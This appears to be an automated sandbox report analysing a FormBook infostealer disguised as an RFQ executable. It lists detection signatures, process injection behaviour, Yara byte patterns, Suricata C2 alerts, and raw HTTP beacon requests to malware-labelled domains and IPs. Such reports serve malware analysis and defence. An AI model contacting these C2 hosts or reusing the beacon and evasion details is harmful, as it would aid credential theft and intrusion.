Windows Analysis Report
RFQ - HTS45785-24-0907I000.exe

Overview

General Information

Sample name: RFQ - HTS45785-24-0907I000.exe
Analysis ID: 1517661
MD5: 8cd57235a1ba838df14c6a67ad2048d0
SHA1: 4fed67f0abcef3c4327774b1d06bf7cf98684db9
SHA256: b0d625e9b21d2f7373775bfeac6ccf6cf362e24d79a61dd4829a82a1595c27f6
Tags: exe, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ - HTS45785-24-0907I000.exe (PID: 4908 cmdline: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe" MD5: 8CD57235A1BA838DF14C6A67AD2048D0)
    • svchost.exe (PID: 4948 cmdline: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • TNPukQnytLH.exe (PID: 4324 cmdline: "C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 2564 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • TNPukQnytLH.exe (PID: 600 cmdline: "C:\Program Files (x86)\wjxgtoMncobeAkkzPULpkrPoVxycPXTVyTXmTBFxpuBY\TNPukQnytLH.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2104 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author | Strings)

00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(9 further entries not shown)

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings)

1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e2c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16472:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f0c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17272:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ParentImage: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, ParentProcessId: 4908, ParentProcessName: RFQ - HTS45785-24-0907I000.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ProcessId: 4948, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ParentImage: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, ParentProcessId: 4908, ParentProcessName: RFQ - HTS45785-24-0907I000.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe", ProcessId: 4948, ProcessName: svchost.exe
            AV Detection

Source: RFQ - HTS45785-24-0907I000.exe; Avira: detected
Source: http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs; Avira URL Cloud: Label: malware
Source: http://www.tempatmudisini01.click/abla/; Avira URL Cloud: Label: malware
Source: http://www.tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010P; Avira URL Cloud: Label: malware
Source: RFQ - HTS45785-24-0907I000.exe; ReversingLabs: Detection: 23%
Source: RFQ - HTS45785-24-0907I000.exe; Virustotal: Detection: 26%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.4160474621.0000000000850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4161745255.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2168727858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4161610339.0000000003A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4161703996.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2169121042.00000000037B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2169602944.0000000004A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ - HTS45785-24-0907I000.exe; Joe Sandbox ML: detected
Source: RFQ - HTS45785-24-0907I000.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: write.pdbGCTL source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: svchost.exe, 00000001.00000002.2168962083.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2168940553.0000000003200000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000005.00000002.4161153797.0000000001517000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TNPukQnytLH.exe, 00000005.00000002.4160485230.000000000098E000.00000002.00000001.01000000.00000005.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161291435.000000000098E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1744701582.0000000003760000.00000004.00001000.00020000.00000000.sdmp, RFQ - HTS45785-24-0907I000.exe, 00000000.00000003.1745326700.0000000004570000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2073984809.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2076245715.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2169156210.0000000003900000.00000040.00001000.00020000.00000000.sdmp, write.exe, write.exe, 00000006.00000002.4161906836.0000000004740000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000006.00000003.2169043412.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000003.2172852458.0000000004595000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000006.00000002.4161906836.00000000048DE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: write.exe, 00000006.00000002.4162310977.0000000004D6C000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000006.00000002.4160569986.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000027EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2462381400.000000001C7AC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0086C340 FindFirstFileW,FindNextFileW,FindClose,6_2_0086C340
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then xor eax, eax6_2_00859A60
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then pop edi6_2_0085DF50
            Source: C:\Windows\SysWOW64\write.exeCode function: 4x nop then mov ebx, 00000004h6_2_046304E8

            Networking

            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49779 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49748 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49746 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49743 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49766 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49740 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49770 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49745 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49737 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 23.224.27.173:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49751 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49768 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49744 -> 52.187.43.73:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49757 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49752 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49784 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49781 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49762 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49776 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49753 -> 81.2.196.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49764 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49783 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49747 -> 199.192.21.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49780 -> 198.252.106.191:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49765 -> 103.21.221.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49769 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49754 -> 107.163.130.249:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49772 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49774 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 15.197.204.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49782 -> 43.154.104.247:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49760 -> 52.223.13.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49785 -> 43.154.104.247:80
            Source: DNS query: www.93187.xyz
            Source: DNS query: www.broomeorchard.xyz
            Source: DNS query: www.suarahati20.xyz
Source: Joe Sandbox View; IP Address: 199.192.21.169
Source: Joe Sandbox View; ASN Name: LINKNET-ID-APLinknetASNID
Source: Joe Sandbox View; ASN Name: NAMECHEAP-NETUS
Source: Joe Sandbox View; ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View; ASN Name: TAKE2US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe | Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global traffic | HTTP traffic detected: GET /i7xp/?Vvn=XtJLE6KXyHJ010P&N0spilI0=1hYOXgym/+H9levHoL4uDmSoKaP5f04LAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+ByycC+m3CBgf9UgTY0pVgzUvtxB6m49SfQluc= HTTP/1.1 | Host: www.whats-in-the-box.org | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /8z5k/?N0spilI0=y1aGUeBTtCWB8PYk9+ZY5neg5WJlbc6kuJGyOOgv6AsofEnOPQxTGp57UW4jl24PiU2QUCC/WnCbrv11FxPlfmqzqWQ0oAXUsuE4toY6QlP7A8hrX6vWgTw=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.1183377.app | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8= HTTP/1.1 | Host: www.52ywq.vip | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.zenscape.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I= HTTP/1.1 | Host: www.asociacia.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
            Source: global traffic | HTTP traffic detected: GET /jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010P HTTP/1.1 | Host: www.93187.xyz | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 | Accept-Language: en-US | Connection: close | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
